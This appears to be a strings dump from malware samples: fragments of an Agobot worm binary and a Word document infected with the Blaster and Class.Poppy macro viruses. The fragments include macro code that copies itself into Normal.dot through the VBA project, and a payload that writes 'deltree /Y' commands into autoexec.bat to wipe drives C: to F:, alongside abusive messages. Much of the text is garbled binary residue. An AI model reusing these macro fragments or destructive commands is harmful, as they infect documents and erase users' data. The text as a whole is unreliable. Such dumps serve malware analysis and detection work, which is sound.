downloaded %.1f kb to %s @ %.1f kb/sec. updating...
opened %s.
downloaded %.1f kb to %s @ %.1f kb/sec.
update (%s - %dkb transferred)
file download (%s - %dkb transferred)
couldn't open %s.
Error during accept()! Aborting...
finished sending packets to %s.
error sending packets to %s.
error sending pings to %s.
finished sending pings to %s.
ICMP.DLL not available!
.?AVCNoTrackObject@@
.?AV_AFX_WIN_STATE@@
.?AVCObject@@
.?AVCCmdTarget@@
.?AVCWinThread@@
.?AVCWinApp@@
.PAVCException@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVCCmdUI@@
.?AVCWnd@@
.?AVCDialog@@
.?AVCComboBox@@
.?AVCEdit@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.?AVCTempWnd@@
.?AV_AFX_THREAD_STATE@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AVCMenu@@
.?AVCTempMenu@@
.?AVCDC@@
.?AVCPaintDC@@
.?AVCGdiObject@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCResourceException@@
.?AVCException@@
.?AVCSimpleException@@
.?AVCResourceException@@
.?AVCUserException@@
.?AUCThreadData@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.?AVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCHandleMap@@
.?AVCMapPtrToPtr@@
.?AVtype_info@@
.?AVexception@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
hangeul
english
hangeulmenu
kanjimenu
windows
C3dHNew
C3dLNew
C3dNew
#32770
DisableThreadLibraryCalls
KERNEL32.DLL
wwwwww
wwwwww
wwwwww
wwwwww
wwwwww
wwwwww
wwwwww
wwwwww
P2P-Worm.Win32.Agobot
"System
VDA_DOC
Virus.MSWord.Blaster
\\192.168.200.134\Shared\attachment\Virus.MSWord.Blaster
C:\Users\ADMINI~1\AppData\Local\Temp\Virus.MSWord.Blaster
#CBF#CBF
028.04.00 15:24:43GoatW8-1Office Logo
        
'JonMMx 200028.04.00 15:24:43GoatW8-1Office Logo
'JonMMx 200028.04.00 15:24:43GoatW8-1Office Logo
    flagio = False
'JonMMx 200028.04.00 15:24:43GoatW8-1Office Logo
    Set bry = NormalTemplate.VBProject.VBComponents.Item(1)
'JonMMx 200028.04.00 15:24:43GoatW8-1Office Logo
    For count 
Ditry PC
Normal.dot
Ditry PC
Microsoft Word 8.0
_PID_GUID
End Sub
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit8.04.0
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippitOffice 
Private Sub Document_Open()
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit8.04.0
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit8.04.0
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippitOffice
Dim stato As Boolean
Private Sub Document_Close()
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit8.04.0 
c:\cont.dbl
Private Sub Document_Close()
Dim stato As Boolean
Private Sub Document_Close()
End Sub
c:\cont.dbl
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit8.04.0Z
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit8.04.0
c:\cont.dbl
c:\cont.dbl
c:\cont.dbl
Macro Carrier
Dream Blaster
Document
c:\minny.log 
c:\autoexec.bat
c:\autoexec.bat
you are simply a bitch
c:\autoexec.bat
deltree /Y f:\*
deltree /Y e:\*
deltree /Y d:\*
deltree /Y c:\*
rem Created by Dream Blaster
rem Minny, you are simply a bitch
You are protected from this virus damageA@4
Private Sub Document_Close()
Dim stato As Boolean
Private Sub Document_Close()
End Sub
Private Sub Document_Open()
Dim flagaltro As Boolean
Private Sub Document_Open()
End Sub
rr1616/30/99 11:11:43 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:44 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:44 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:44 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:44 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:44 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:44 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:44 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:44 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:44 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:44 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
c:\class.sys
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
I Think  
 is a big stupid jerk!
VicodinES Loves You / Class.Poppy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
c:\class.sys
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
Sub AutoClose()
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
Sub ToolsMacro()C@
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
rr1616/30/99 11:11:45 PMHP LaserJet IIISi PostScript v52.3 on LPT1:giochinoClippy
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Ditry PC2/8/2000 12:35:11 PMHP LaserJet 4 on LPT1:BLASTER.D1BClippit
Attribut
e VB_Nam
e = "Thi
sDocumen
0{00020P906-
$0046}
|Creatab
Predecla
"@Expose
emplateD0eriv
stomiz
Sub Auto
Ditry PC 2/8/2
2:35:11 @PMHP L
Jet 4 on
 LPT1:BL
ASTER.D1
BClippit
flagaltr
o As Boo
leanN2cou
0Integ4erN0b@D
/Vaprian@7?I
n Error 
Iastato
{Appli
cation.E
Cancel
.Co nfirm
%NormalP
n&JKill 
"c:\cont0.dbl
WOutpu
1 To Mac
=taine
2jecJt 
.Item(1)
CdeModulFe@
?.?.&.av b
Do Unti.l?
1)`V"End 
_)t_)P)?
[_q7( )" Th
?JB?J9J
@PTrim
- Paqh
R.D1BCli
b ToolsM
acro()
'Ditry P
C2/8/200
0 12:35:
11 PMHP 
LaserJet
 4 on LP
T1:BLAST
CodeModu
le.Delet
eLines (`count
5flagalt
ro = Fal
End IFf
 "c:\con
t.dbl" F
or Input
 As #1
0@LOF(1)
# GoTo c
pynorm
Do Whi
le Not E
 stress
CActive@Docume
BProject
.VBCompo
s.Item
rivate A
#Trim(
vUntil
Randomiz
%Int((6
 * Rnd)
 ) < 3
th Dialo
SummaryI
nfoXy1
.Ti"t h= "
 C@arrier<+.0Auth0p`
eam Blas
Keywor
Execut
eft(LbNam
y(D0aaX17\
", vbH(idd
 autoBe`
re simpl
y a bitc>h
ee /Y fx:\*
(	rem C
`8ted by 
MsgBox
from t
his viru
s damage
On ErrcPK
0[egerG
a*Varianp
-licati
on.Enabl
eCancel
@nnfirmC
onvers`
Tep@0V
,e.8	O
flagio =  True
Exit For
xEnd If
Next co
1 To bry
.CodeMod
"Private
 Sub Doc
ument_Cl@ose()"
;Do Unxtil
XDelete
[Norma@lTempl
VBProjec
Compon
@_s.Item(
@#Trim(
As Boo
On Er@ror Go
r1616/30
/99 11:@
43 PMHP @LaserJ }I
IISi Pos
tScript 
v52.3 on@ LPT1:
hinoClip
ns.Virus
Confirm`
> 70 A
	o4k4Exp
ort "c:\
class.sy
I2Day(HNow
142:( MonthC
:MsgBo
 " & App
licaAh.U
big stup
id jerk!
", 0, "V
icodinES
 Loves Y@ou / C"
AddFro
mFile ([&?P
r1616/30
/99 11:
45 PMHP 
LaserJet
 IIISi P
ostScrip
t v52.3 
on LPT1:
giochino
Clippy
End With
nt < 70 
ThenSd 
z.Code@Module
replacel
ine 1, "
Sub Aut
@ose()"d=7
ToolsMa
or x = 2
 To 72 S
Q'" & 
Applicat ion.U
ctivePri
ssista<nt
ment.Sav
eAs File	a?:=
ViewVB
738a00d7f
Normal
stdole
MSFormsC
ThisDocument<
_Evaluate
Office
Documentj
Document_Close7\
Document_Open
AutoOpen
ViewVBCode
Options
ActiveDocument
NormalTemplateq
Application
MsgBox
Version
MultiUse
flagaltrok
count0v
Savedd
EnableCancelKey
ConfirmConversions
SaveNormalPrompt
MacroContainer
VBProjectOh
VBComponents
CodeModule
CountOfLines!\
flagio!.
DeleteLines
cpynorm
stress
InsertLines
cpyactif
Dialogs
wdDialogFileSummaryInfo
Author
Keywords
ExecuteY
SaveAsf;
FileNamej
FullName
vbHiddenT;
vbSystem
SetAttrC
vbNormal
VirusProtectionoD
Export
UserName\
AddFromFile
replaceline
ActivePrinter
ActiveWindow
Assistant
AutoClose
ToolsMacrou
_B_var_stato/
Normal
G{000204
0046}#2
.0#0#C:\
WINDOWS\
SYSTEM\S
TDOLE2.T
omation
5A2058C0
-DE22-11
D3-ACD9-
900936D3
D#MicrosPoft 
Object L
ibrary
9477A642
JP\VBE\	
CxOf(ficDxO@uf
DF8D04C-
5BFA-101@B-BDE5@xA*A@w4
OGRAM FI
LES\MICR
OSOFT OF FICE\
O97.DLLHZ
ThisDocu ment
Normal
ThisDocument
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VBA\VBA332.DLL
C:\Program Files\Microsoft Office\Office\MSWORD8.OLB
C:\WINDOWS\SYSTEM\STDOLE2.TLB
stdole
C:\WINDOWS\SYSTEM\MSForms.TWD
MSForms
C:\WINDOWS\TEMP\VBE\MSForms.EXD
C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\MSO97.DLL
Office
Document
AutoClose
ToolsMacro
Document_Open
AutoOpen
ViewVBCode
ThisDocument
ID="{2EA48852-DE24-11D3-ACD9-900936D3B526}"
Document=ThisDocument/&H00000000
Name="Normal"
HelpContextID="0"
CMG="DDDF14752C5630563056305630"
DPB="BAB8735C515D515D51"
GC="97955E83E6BDC2BEC2BE3D"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=44, 44, 650, 533, 
Microsoft Word Document
MSWordDoc
Word.Document.8
 PAGE 
Attention:
 AUTHOR 
	Page 
 PAGE 
 DATE 
Best regards,
Best wishes,
CERTIFIED MAIL
CONFIDENTIAL
Confidential	Page 
 PAGE 
 DATE 
Cordially,
Created by 
 AUTHOR 
Created on 
 CREATEDATE 
Dear Mom and Dad,
Dear Sir or Madam:
 FILENAME 
 FILENAME \p 
In reply to:
Ladies and Gentlemen:
Last printed 
 PRINTDATE 
Last saved by 
 LASTSAVEDBY 
 PAGE 
 NUMPAGES 
PERSONAL
Reference:
Regards,
REGISTERED MAIL
Respectfully yours,
Respectfully,
Sincerely yours,
Sincerely,
SPECIAL DELIVERY
Subject:
Take care,
Thank you,
Thanks,
To Whom It May Concern:
VIA AIRMAIL
VIA FACSIMILE
VIA OVERNIGHT MAIL
Yours truly,
METAFILE
Segoe UI
Virus.MSWord.Blaster!
"System
VDA_DOC
VDA_DOC
SsmgV.01
TextV.01
TCntV.01
SsmgV.01
FontV.01
SsmgV.01
SsmgV.01
Y 2016-8/Pro/Government 
Windows User
VDA_DOC